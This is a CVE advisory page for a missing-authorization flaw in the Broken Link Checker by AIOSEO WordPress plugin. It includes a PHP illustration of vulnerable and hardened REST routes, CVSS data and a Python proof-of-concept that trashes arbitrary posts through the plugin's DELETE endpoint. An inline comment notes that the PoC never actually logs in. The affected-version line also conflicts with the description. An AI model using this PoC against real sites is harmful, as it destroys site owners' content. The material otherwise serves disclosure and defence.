Security Vulnerability Report
CVE-2025-11734 CVSS 5.4 MEDIUM

CVE-2025-11734

Published: 2025-11-18 10:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Broken Link Checker by AIOSEO – Easily Fix/Monitor Internal and External links plugin for WordPress is vulnerable to unauthorized post modification due to missing authorization in all versions up to, and including, 1.2.5. This is due to the plugin registering a REST API endpoint that only checks for a broad capability (aioseo_blc_broken_links_page) that is granted to contributor level users, without verifying the user's permission to perform actions on the specific post being targeted. This makes it possible for authenticated attackers, with contributor level access and above, to trash arbitrary posts via the DELETE /wp-json/aioseoBrokenLinkChecker/v1/post endpoint.
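The description above is an instance of CWE-862 (missing authorization) in a WordPress REST route: the permission callback tests a broad capability that contributors hold, but never asks whether the caller may act on the specific post named in the request. The following PHP is an added illustration, not the plugin's code, showing that pattern beside a hardened route that keeps the broad capability check and adds an object-level check. The namespace, route paths, handler and capability name are hypothetical; the WordPress API calls are real.

```php
<?php
// Added illustration (not the plugin's code): a REST DELETE route that checks
// only a broad capability, beside a version that also authorizes the caller
// against the specific post. Namespace, routes and capability name are
// hypothetical; the WordPress functions are real.

add_action( 'rest_api_init', function () {

    // Vulnerable pattern: the permission callback tests a page-level capability
    // that contributors hold, so any contributor reaches the handler for any
    // post ID. Nothing ties the request to a post the caller may edit.
    register_rest_route( 'example-blc/v1', '/post', [
        'methods'             => WP_REST_Server::DELETABLE,
        'callback'            => 'example_blc_trash_post',
        'permission_callback' => function () {
            return current_user_can( 'example_blc_broken_links_page' );
        },
    ] );

    // Hardened pattern: the broad capability is still required, and the
    // request is additionally authorized against the targeted object.
    register_rest_route( 'example-blc/v1', '/post-secure', [
        'methods'             => WP_REST_Server::DELETABLE,
        'callback'            => 'example_blc_trash_post',
        'args'                => [
            'id' => [
                'required'          => true,
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
                'sanitize_callback' => 'absint',
            ],
        ],
        'permission_callback' => function ( WP_REST_Request $request ) {
            if ( ! current_user_can( 'example_blc_broken_links_page' ) ) {
                return new WP_Error( 'rest_forbidden', 'Missing capability.', [ 'status' => 403 ] );
            }
            $post_id = (int) $request->get_param( 'id' );
            if ( ! get_post( $post_id ) ) {
                return new WP_Error( 'rest_post_invalid_id', 'Invalid post ID.', [ 'status' => 404 ] );
            }
            // Object-level check: WordPress maps the delete_post meta capability
            // to delete_posts / delete_others_posts / delete_published_posts
            // according to the post's owner and status, so a contributor can
            // only trash their own unpublished posts.
            if ( ! current_user_can( 'delete_post', $post_id ) ) {
                return new WP_Error( 'rest_cannot_delete', 'You are not allowed to trash this post.', [ 'status' => 403 ] );
            }
            return true;
        },
    ] );
} );

// Shared handler: by the time it runs, the hardened route has already
// established that the caller may trash exactly this post.
function example_blc_trash_post( WP_REST_Request $request ) {
    $post_id = (int) $request->get_param( 'id' );
    $result  = wp_trash_post( $post_id );
    if ( ! $result ) {
        return new WP_Error( 'trash_failed', 'Could not trash post.', [ 'status' => 500 ] );
    }
    return rest_ensure_response( [ 'trashed' => $post_id ] );
}
```

When auditing a plugin for this class of bug, look at every `permission_callback` (and every AJAX or admin-post handler) that receives an object ID and confirm it calls a per-object meta capability such as `edit_post`, `delete_post` or `read_post` with that ID, rather than only a plugin-wide or page-level capability.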

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Broken Link Checker by AIOSEO plugin < 1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-11734 PoC - Broken Link Checker Plugin Authorization Bypass
# Target: WordPress site with Broken Link Checker plugin <= 1.2.5
target_url = "http://target-wordpress-site.com"
username = "contributor_user"
password = "contributor_password"

# Step 1: Authenticate and get nonce
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In"
}
# (As written, login_data is built but never submitted, so the session
# carries no authentication cookies when the request below is sent.)

# Step 2: Delete arbitrary post via vulnerable REST API endpoint
post_id_to_delete = 123  # Target post ID
api_url = f"{target_url}/wp-json/aioseoBrokenLinkChecker/v1/post"
headers = {
    "Content-Type": "application/json",
    "X-WP-Nonce": session.cookies.get("wordpress_test_cookie") or ""
}
payload = {
    "id": post_id_to_delete
}

# Send DELETE request to delete arbitrary post
response = session.delete(api_url, json=payload, headers=headers)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# Note: This PoC demonstrates the authorization bypass vulnerability
# The attacker can delete any post without proper authorization check

References

https://plugins.trac.wordpress.org/changeset/3390304/broken-link-checker-seo
https://www.wordfence.com/threat-intel/vulnerabilities/id/0254cd1b-f8f6-400e-a48e-81bd553fe8d1?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11734", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:44.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Broken Link Checker by AIOSEO – Easily Fix/Monitor Internal and External links plugin for WordPress is vulnerable to unauthorized post modification due to missing authorization in all versions up to, and including, 1.2.5. This is due to the plugin registering a REST API endpoint that only checks for a broad capability (aioseo_blc_broken_links_page) that is granted to contributor level users, without verifying the user's permission to perform actions on the specific post being targeted. This makes it possible for authenticated attackers, with contributor level access and above, to trash arbitrary posts via the DELETE /wp-json/aioseoBrokenLinkChecker/v1/post endpoint."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3390304/broken-link-checker-seo", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0254cd1b-f8f6-400e-a48e-81bd553fe8d1?source=cve", "source": "[email protected]"}]}}